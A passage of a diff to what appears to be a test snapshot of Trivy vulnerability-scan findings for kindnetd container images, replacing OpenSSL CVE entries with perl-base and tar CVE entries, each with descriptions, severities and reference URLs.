"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-1", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5169", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220621.txt", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4450", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-16156", + "installedVersion": "5.28.1-6+deb10u1", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4450", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", - "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", - "https://linux.oracle.com/cve/CVE-2022-4450.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", - "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4450", - "https://www.openssl.org/news/secadv/20230207.txt", + "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "https://access.redhat.com/security/cve/CVE-2020-16156", + "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "https://ubuntu.com/security/notices/USN-5689-1", + "https://ubuntu.com/security/notices/USN-5689-2", + "https://www.cve.org/CVERecord?id=CVE-2020-16156", ], }, "category": "Vulnerability", - "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "description": "CPAN 2.28 allows Signature Verification Bypass.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "double free after calling PEM_read_bio_ex", + "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4450", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4450", + "value": "https://avd.aquasec.com/nvd/cve-2020-16156", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://access.redhat.com/security/cve/CVE-2020-16156", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://ubuntu.com/security/notices/USN-5689-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://ubuntu.com/security/notices/USN-5689-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31484", + "installedVersion": "5.28.1-6+deb10u1", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "https://github.com/andk/cpanpm/pull/175", + "https://metacpan.org/dist/CPAN/changes", + "https://ubuntu.com/security/notices/USN-6112-1", + "https://ubuntu.com/security/notices/USN-6112-2", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", + ], + }, + "category": "Vulnerability", + "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://avd.aquasec.com/nvd/cve-2023-31484", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://github.com/andk/cpanpm/pull/175", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://metacpan.org/dist/CPAN/changes", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://ubuntu.com/security/notices/USN-6112-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://ubuntu.com/security/notices/USN-6112-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-4116", + "installedVersion": "5.28.1-6+deb10u1", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "https://access.redhat.com/security/cve/CVE-2011-4116", + "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "https://seclists.org/oss-sec/2011/q4/238", + "https://www.cve.org/CVERecord?id=CVE-2011-4116", + ], + }, + "category": "Vulnerability", + "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "perl: File::Temp insecure temporary file handling", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://avd.aquasec.com/nvd/cve-2011-4116", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://access.redhat.com/security/cve/CVE-2011-4116", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://seclists.org/oss-sec/2011/q4/238", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31486", + "installedVersion": "5.28.1-6+deb10u1", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://github.com/chansen/p5-http-tiny/pull/153", + "https://hackeriet.github.io/cpan-http-tiny-overview/", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + ], + }, + "category": "Vulnerability", + "description": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available ...", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://avd.aquasec.com/nvd/cve-2023-31486", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "value": "https://github.com/chansen/p5-http-tiny/pull/153", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0215", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2005-2541", + "installedVersion": "1.30+dfsg-6", + "packageName": "tar", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0215", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", - "https://github.com/advisories/GHSA-r7jw-wp68-3xch", - "https://linux.oracle.com/cve/CVE-2023-0215.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", - "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://security.netapp.com/advisory/ntap-20230427-0009/", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0215", - "https://www.openssl.org/news/secadv/20230207.txt", + "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "https://access.redhat.com/security/cve/CVE-2005-2541", + "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "https://www.cve.org/CVERecord?id=CVE-2005-2541", ], }, "category": "Vulnerability", - "description": "The public API function BIO_new_NDEF is a helper function used for streaming -ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the -SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by -end user applications. - -The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter -BIO onto the front of it to form a BIO chain, and then returns the new head of -the BIO chain to the caller. Under certain conditions, for example if a CMS -recipient public key is invalid, the new filter BIO is freed and the function -returns a NULL result indicating a failure. However, in this case, the BIO chain -is not properly cleaned up and the BIO passed by the caller still retains -internal pointers to the previously freed filter BIO. If the caller then goes on -to call BIO_pop() on the BIO then a use-after-free will occur. This will most -likely result in a crash. - - - -This scenario occurs directly in the internal function B64_write_ASN1() which -may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on -the BIO. This internal function is in turn called by the public API functions -PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, -SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. - -Other public API functions that may be impacted by this include -i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and -i2d_PKCS7_bio_stream. - -The OpenSSL cms and smime command line applications are similarly affected. - - - -", + "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "use-after-free following BIO_new_NDEF", + "name": "tar: does not properly warn the user when extracting setuid or setgid files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0215", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0215", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://avd.aquasec.com/nvd/cve-2005-2541", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://access.redhat.com/security/cve/CVE-2005-2541", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9923", + "installedVersion": "1.30+dfsg-6", + "packageName": "tar", + "references": [ + "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120", + "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html", + "http://savannah.gnu.org/bugs/?55369", + "https://access.redhat.com/security/cve/CVE-2019-9923", + "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9923", + "https://ubuntu.com/security/notices/USN-4692-1", + "https://www.cve.org/CVERecord?id=CVE-2019-9923", + ], + }, + "category": "Vulnerability", + "description": "pax_decode_header in sparse.c in GNU Tar before 1.32 had a NULL pointer dereference when parsing certain archives that have malformed extended headers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "tar: null-pointer dereference in pax_decode_header in sparse.c", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://avd.aquasec.com/nvd/cve-2019-9923", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "http://savannah.gnu.org/bugs/?55369", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://access.redhat.com/security/cve/CVE-2019-9923", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9923", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://ubuntu.com/security/notices/USN-4692-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9923", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20193", + "installedVersion": "1.30+dfsg-6", + "packageName": "tar", + "references": [ + 